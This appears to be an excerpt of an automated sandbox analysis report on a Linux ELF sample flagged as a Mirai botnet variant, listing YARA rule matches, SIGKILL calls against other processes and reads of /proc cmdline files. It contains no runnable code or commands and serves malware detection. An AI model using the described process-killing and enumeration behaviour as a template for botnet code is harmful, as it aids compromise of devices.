              Source: /tmp/s8y4CBbFHW.elf (PID: 5443)SIGKILL sent: pid: 3182, result: successfulJump to behavior
              Source: /tmp/s8y4CBbFHW.elf (PID: 5443)SIGKILL sent: pid: 3212, result: successfulJump to behavior
              Source: /tmp/s8y4CBbFHW.elf (PID: 5443)SIGKILL sent: pid: 5438, result: successfulJump to behavior
              Source: /tmp/s8y4CBbFHW.elf (PID: 5443)SIGKILL sent: pid: 5439, result: successfulJump to behavior
              Source: /tmp/s8y4CBbFHW.elf (PID: 5443)SIGKILL sent: pid: 5441, result: successfulJump to behavior
              Source: /tmp/s8y4CBbFHW.elf (PID: 5443)SIGKILL sent: pid: 5457, result: successfulJump to behavior
              Source: /tmp/s8y4CBbFHW.elf (PID: 5443)SIGKILL sent: pid: 5458, result: successfulJump to behavior
              Source: /tmp/s8y4CBbFHW.elf (PID: 5443)SIGKILL sent: pid: 5459, result: successfulJump to behavior
              Source: /tmp/s8y4CBbFHW.elf (PID: 5443)SIGKILL sent: pid: 5460, result: successfulJump to behavior
              Source: /tmp/s8y4CBbFHW.elf (PID: 5443)SIGKILL sent: pid: 5461, result: successfulJump to behavior
              Source: /tmp/s8y4CBbFHW.elf (PID: 5443)SIGKILL sent: pid: 5462, result: successfulJump to behavior
              Source: /tmp/s8y4CBbFHW.elf (PID: 5443)SIGKILL sent: pid: 5478, result: successfulJump to behavior
              Source: /tmp/s8y4CBbFHW.elf (PID: 5443)SIGKILL sent: pid: 5487, result: successfulJump to behavior
              Source: s8y4CBbFHW.elf, type: SAMPLEMatched rule: MAL_ELF_LNX_Mirai_Oct10_1 date = 2018-10-27, hash1 = 3be2d250a3922aa3f784e232ce13135f587ac713b55da72ef844d64a508ddcfe, author = Florian Roth, description = Detects ELF Mirai variant, reference = Internal Research
              Source: s8y4CBbFHW.elf, type: SAMPLEMatched rule: MAL_ELF_LNX_Mirai_Oct10_2 date = 2018-10-27, hash1 = fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9, author = Florian Roth, description = Detects ELF malware Mirai related, reference = Internal Research
              Source: 5441.1.00007f5714400000.00007f5714412000.r-x.sdmp, type: MEMORYMatched rule: MAL_ELF_LNX_Mirai_Oct10_1 date = 2018-10-27, hash1 = 3be2d250a3922aa3f784e232ce13135f587ac713b55da72ef844d64a508ddcfe, author = Florian Roth, description = Detects ELF Mirai variant, reference = Internal Research
              Source: 5441.1.00007f5714400000.00007f5714412000.r-x.sdmp, type: MEMORYMatched rule: MAL_ELF_LNX_Mirai_Oct10_2 date = 2018-10-27, hash1 = fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9, author = Florian Roth, description = Detects ELF malware Mirai related, reference = Internal Research
              Source: 5438.1.00007f5714400000.00007f5714412000.r-x.sdmp, type: MEMORYMatched rule: MAL_ELF_LNX_Mirai_Oct10_1 date = 2018-10-27, hash1 = 3be2d250a3922aa3f784e232ce13135f587ac713b55da72ef844d64a508ddcfe, author = Florian Roth, description = Detects ELF Mirai variant, reference = Internal Research
              Source: 5438.1.00007f5714400000.00007f5714412000.r-x.sdmp, type: MEMORYMatched rule: MAL_ELF_LNX_Mirai_Oct10_2 date = 2018-10-27, hash1 = fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9, author = Florian Roth, description = Detects ELF malware Mirai related, reference = Internal Research
              Source: 5439.1.00007f5714400000.00007f5714412000.r-x.sdmp, type: MEMORYMatched rule: MAL_ELF_LNX_Mirai_Oct10_1 date = 2018-10-27, hash1 = 3be2d250a3922aa3f784e232ce13135f587ac713b55da72ef844d64a508ddcfe, author = Florian Roth, description = Detects ELF Mirai variant, reference = Internal Research
              Source: 5439.1.00007f5714400000.00007f5714412000.r-x.sdmp, type: MEMORYMatched rule: MAL_ELF_LNX_Mirai_Oct10_2 date = 2018-10-27, hash1 = fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9, author = Florian Roth, description = Detects ELF malware Mirai related, reference = Internal Research
              Source: 5432.1.00007f5714400000.00007f5714412000.r-x.sdmp, type: MEMORYMatched rule: MAL_ELF_LNX_Mirai_Oct10_1 date = 2018-10-27, hash1 = 3be2d250a3922aa3f784e232ce13135f587ac713b55da72ef844d64a508ddcfe, author = Florian Roth, description = Detects ELF Mirai variant, reference = Internal Research
              Source: 5432.1.00007f5714400000.00007f5714412000.r-x.sdmp, type: MEMORYMatched rule: MAL_ELF_LNX_Mirai_Oct10_2 date = 2018-10-27, hash1 = fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9, author = Florian Roth, description = Detects ELF malware Mirai related, reference = Internal Research
              Source: 5436.1.00007f5714400000.00007f5714412000.r-x.sdmp, type: MEMORYMatched rule: MAL_ELF_LNX_Mirai_Oct10_1 date = 2018-10-27, hash1 = 3be2d250a3922aa3f784e232ce13135f587ac713b55da72ef844d64a508ddcfe, author = Florian Roth, description = Detects ELF Mirai variant, reference = Internal Research
              Source: 5436.1.00007f5714400000.00007f5714412000.r-x.sdmp, type: MEMORYMatched rule: MAL_ELF_LNX_Mirai_Oct10_2 date = 2018-10-27, hash1 = fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9, author = Florian Roth, description = Detects ELF malware Mirai related, reference = Internal Research
              Source: classification engineClassification label: mal100.spre.troj.linELF@0/1@25/0
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5457)Directory: /home/saturnino/.Xdefaults-galassiaJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5458)Directory: /home/saturnino/.Xdefaults-galassiaJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5459)Directory: /home/saturnino/.Xdefaults-galassiaJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5460)Directory: /home/saturnino/.Xdefaults-galassiaJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5461)Directory: /home/saturnino/.Xdefaults-galassiaJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5461)Directory: /usr/share/fonts/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5461)Directory: /usr/local/share/fonts/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5461)Directory: /home/saturnino/.local/share/fonts/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5461)Directory: /home/saturnino/.fonts/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5461)Directory: /usr/share/fonts/X11/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5461)Directory: /usr/share/fonts/cMap/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5461)Directory: /usr/share/fonts/cmap/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5461)Directory: /usr/share/fonts/opentype/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5461)Directory: /usr/share/fonts/truetype/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5461)Directory: /usr/share/fonts/type1/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5461)Directory: /usr/share/fonts/X11/Type1/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5461)Directory: /usr/share/fonts/X11/encodings/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5461)Directory: /usr/share/fonts/X11/misc/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5461)Directory: /usr/share/fonts/X11/util/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5461)Directory: /usr/share/fonts/cmap/adobe-cns1/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5461)Directory: /usr/share/fonts/cmap/adobe-gb1/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5461)Directory: /usr/share/fonts/cmap/adobe-japan1/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5461)Directory: /usr/share/fonts/cmap/adobe-japan2/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5461)Directory: /usr/share/fonts/cmap/adobe-korea1/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5461)Directory: /usr/share/fonts/opentype/malayalam/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5461)Directory: /usr/share/fonts/opentype/mathjax/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5461)Directory: /usr/share/fonts/opentype/noto/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5461)Directory: /usr/share/fonts/opentype/urw-base35/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5461)Directory: /usr/share/fonts/truetype/Gargi/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5461)Directory: /usr/share/fonts/truetype/Gubbi/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5461)Directory: /usr/share/fonts/truetype/Nakula/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5461)Directory: /usr/share/fonts/truetype/Navilu/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5461)Directory: /usr/share/fonts/truetype/Sahadeva/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5461)Directory: /usr/share/fonts/truetype/Sarai/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5461)Directory: /usr/share/fonts/truetype/abyssinica/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5461)Directory: /usr/share/fonts/truetype/ancient-scripts/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5461)Directory: /usr/share/fonts/truetype/dejavu/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5461)Directory: /usr/share/fonts/truetype/droid/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5461)Directory: /usr/share/fonts/truetype/fonts-beng-extra/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5461)Directory: /usr/share/fonts/truetype/fonts-deva-extra/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5461)Directory: /usr/share/fonts/truetype/fonts-gujr-extra/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5461)Directory: /usr/share/fonts/truetype/fonts-guru-extra/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5461)Directory: /usr/share/fonts/truetype/fonts-kalapi/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5461)Directory: /usr/share/fonts/truetype/fonts-orya-extra/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5461)Directory: /usr/share/fonts/truetype/fonts-telu-extra/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5461)Directory: /usr/share/fonts/truetype/fonts-yrsa-rasa/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5461)Directory: /usr/share/fonts/truetype/freefont/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5461)Directory: /usr/share/fonts/truetype/kacst/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5461)Directory: /usr/share/fonts/truetype/kacst-one/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5461)Directory: /usr/share/fonts/truetype/lao/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5461)Directory: /usr/share/fonts/truetype/lato/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5461)Directory: /usr/share/fonts/truetype/liberation/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5461)Directory: /usr/share/fonts/truetype/liberation2/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5461)Directory: /usr/share/fonts/truetype/lohit-assamese/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5461)Directory: /usr/share/fonts/truetype/lohit-bengali/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5461)Directory: /usr/share/fonts/truetype/lohit-devanagari/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5461)Directory: /usr/share/fonts/truetype/lohit-gujarati/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5461)Directory: /usr/share/fonts/truetype/lohit-kannada/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5461)Directory: /usr/share/fonts/truetype/lohit-malayalam/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5461)Directory: /usr/share/fonts/truetype/lohit-oriya/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5461)Directory: /usr/share/fonts/truetype/lohit-punjabi/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5461)Directory: /usr/share/fonts/truetype/lohit-tamil/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5461)Directory: /usr/share/fonts/truetype/lohit-tamil-classical/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5461)Directory: /usr/share/fonts/truetype/lohit-telugu/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5461)Directory: /usr/share/fonts/truetype/malayalam/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5461)Directory: /usr/share/fonts/truetype/noto/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5461)Directory: /usr/share/fonts/truetype/openoffice/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5461)Directory: /usr/share/fonts/truetype/padauk/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5461)Directory: /usr/share/fonts/truetype/pagul/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5461)Directory: /usr/share/fonts/truetype/samyak/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5461)Directory: /usr/share/fonts/truetype/samyak-fonts/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5461)Directory: /usr/share/fonts/truetype/sinhala/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5461)Directory: /usr/share/fonts/truetype/tibetan-machine/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5461)Directory: /usr/share/fonts/truetype/tlwg/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5461)Directory: /usr/share/fonts/truetype/ttf-khmeros-core/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5461)Directory: /usr/share/fonts/truetype/ubuntu/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5461)Directory: /usr/share/fonts/type1/urw-base35/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5461)Directory: /usr/share/fonts/X11/encodings/large/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5461)Directory: /home/saturnino/.cacheJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5461)Directory: /home/saturnino/.localJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5461)Directory: /home/saturnino/.configJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5462)Directory: /home/saturnino/.Xdefaults-galassiaJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5462)Directory: /usr/share/fonts/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5462)Directory: /usr/local/share/fonts/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5462)Directory: /home/saturnino/.local/share/fonts/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5462)Directory: /home/saturnino/.fonts/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5462)Directory: /usr/share/fonts/X11/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5462)Directory: /usr/share/fonts/cMap/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5462)Directory: /usr/share/fonts/cmap/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5462)Directory: /usr/share/fonts/opentype/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5462)Directory: /usr/share/fonts/truetype/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5462)Directory: /usr/share/fonts/type1/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5462)Directory: /usr/share/fonts/X11/Type1/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5462)Directory: /usr/share/fonts/X11/encodings/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5462)Directory: /usr/share/fonts/X11/misc/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5462)Directory: /usr/share/fonts/X11/util/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5462)Directory: /usr/share/fonts/cmap/adobe-cns1/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5462)Directory: /usr/share/fonts/cmap/adobe-gb1/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5462)Directory: /usr/share/fonts/cmap/adobe-japan1/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5462)Directory: /usr/share/fonts/cmap/adobe-japan2/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5462)Directory: /usr/share/fonts/cmap/adobe-korea1/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5462)Directory: /usr/share/fonts/opentype/malayalam/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5462)Directory: /usr/share/fonts/opentype/mathjax/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5462)Directory: /usr/share/fonts/opentype/noto/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5462)Directory: /usr/share/fonts/opentype/urw-base35/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5462)Directory: /usr/share/fonts/truetype/Gargi/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5462)Directory: /usr/share/fonts/truetype/Gubbi/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5462)Directory: /usr/share/fonts/truetype/Nakula/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5462)Directory: /usr/share/fonts/truetype/Navilu/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5462)Directory: /usr/share/fonts/truetype/Sahadeva/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5462)Directory: /usr/share/fonts/truetype/Sarai/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5462)Directory: /usr/share/fonts/truetype/abyssinica/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5462)Directory: /usr/share/fonts/truetype/ancient-scripts/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5462)Directory: /usr/share/fonts/truetype/dejavu/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5462)Directory: /usr/share/fonts/truetype/droid/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5462)Directory: /usr/share/fonts/truetype/fonts-beng-extra/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5462)Directory: /usr/share/fonts/truetype/fonts-deva-extra/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5462)Directory: /usr/share/fonts/truetype/fonts-gujr-extra/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5462)Directory: /usr/share/fonts/truetype/fonts-guru-extra/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5462)Directory: /usr/share/fonts/truetype/fonts-kalapi/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5462)Directory: /usr/share/fonts/truetype/fonts-orya-extra/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5462)Directory: /usr/share/fonts/truetype/fonts-telu-extra/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5462)Directory: /usr/share/fonts/truetype/fonts-yrsa-rasa/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5462)Directory: /usr/share/fonts/truetype/freefont/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5462)Directory: /usr/share/fonts/truetype/kacst/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5462)Directory: /usr/share/fonts/truetype/kacst-one/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5462)Directory: /usr/share/fonts/truetype/lao/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/xfconf/xfconfd (PID: 5478)Directory: /home/saturnino/.cacheJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/xfconf/xfconfd (PID: 5478)Directory: /home/saturnino/.localJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/xfconf/xfconfd (PID: 5478)Directory: /home/saturnino/.configJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/xfconf/xfconfd (PID: 5478)Directory: /home/saturnino/.configJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/notifyd/xfce4-notifyd (PID: 5487)Directory: /home/saturnino/.Xdefaults-galassiaJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/notifyd/xfce4-notifyd (PID: 5487)Directory: /home/saturnino/.cacheJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/notifyd/xfce4-notifyd (PID: 5487)Directory: /home/saturnino/.localJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/notifyd/xfce4-notifyd (PID: 5487)Directory: /home/saturnino/.configJump to behavior
              Source: /tmp/s8y4CBbFHW.elf (PID: 5443)File opened: /proc/3122/cmdlineJump to behavior
              Source: /tmp/s8y4CBbFHW.elf (PID: 5443)File opened: /proc/3117/cmdlineJump to behavior
              Source: /tmp/s8y4CBbFHW.elf (PID: 5443)File opened: /proc/3114/cmdlineJump to behavior
              Source: /tmp/s8y4CBbFHW.elf (PID: 5443)File opened: /proc/914/cmdlineJump to behavior
              Source: /tmp/s8y4CBbFHW.elf (PID: 5443)File opened: /proc/518/cmdlineJump to behavior
              Source: /tmp/s8y4CBbFHW.elf (PID: 5443)File opened: /proc/5416/cmdlineJump to behavior
              Source: /tmp/s8y4CBbFHW.elf (PID: 5443)File opened: /proc/519/cmdlineJump to behavior
              Source: /tmp/s8y4CBbFHW.elf (PID: 5443)File opened: /proc/5417/cmdlineJump to behavior
              Source: /tmp/s8y4CBbFHW.elf (PID: 5443)File opened: /proc/917/cmdlineJump to behavior
              Source: /tmp/s8y4CBbFHW.elf (PID: 5443)File opened: /proc/5273/cmdlineJump to behavior
              Source: /tmp/s8y4CBbFHW.elf (PID: 5443)File opened: /proc/3772/cmdlineJump to behavior
              Source: /tmp/s8y4CBbFHW.elf (PID: 5443)File opened: /proc/3134/cmdlineJump to behavior
              Source: /tmp/s8y4CBbFHW.elf (PID: 5443)File opened: /proc/3375/cmdlineJump to behavior
              Source: /tmp/s8y4CBbFHW.elf (PID: 5443)File opened: /proc/3132/cmdlineJump to behavior
              Source: /tmp/s8y4CBbFHW.elf (PID: 5443)File opened: /proc/3095/cmdlineJump to behavior
              Source: /tmp/s8y4CBbFHW.elf (PID: 5443)File opened: /proc/1745/cmdlineJump to behavior
              Source: /tmp/s8y4CBbFHW.elf (PID: 5443)File opened: /proc/1866/cmdlineJump to behavior
              Source: /tmp/s8y4CBbFHW.elf (PID: 5443)File opened: /proc/1588/cmdlineJump to behavior
              Source: /tmp/s8y4CBbFHW.elf (PID: 5443)File opened: /proc/884/cmdlineJump to behavior
              Source: /tmp/s8y4CBbFHW.elf (PID: 5443)File opened: /proc/1982/cmdlineJump to behavior
              Source: /tmp/s8y4CBbFHW.elf (PID: 5443)File opened: /proc/765/cmdlineJump to behavior
              Source: /tmp/s8y4CBbFHW.elf (PID: 5443)File opened: /proc/3246/cmdlineJump to behavior
              Source: /tmp/s8y4CBbFHW.elf (PID: 5443)File opened: /proc/767/cmdlineJump to behavior
              Source: /tmp/s8y4CBbFHW.elf (PID: 5443)File opened: /proc/800/cmdlineJump to behavior
              Source: /tmp/s8y4CBbFHW.elf (PID: 5443)File opened: /proc/1906/cmdlineJump to behavior
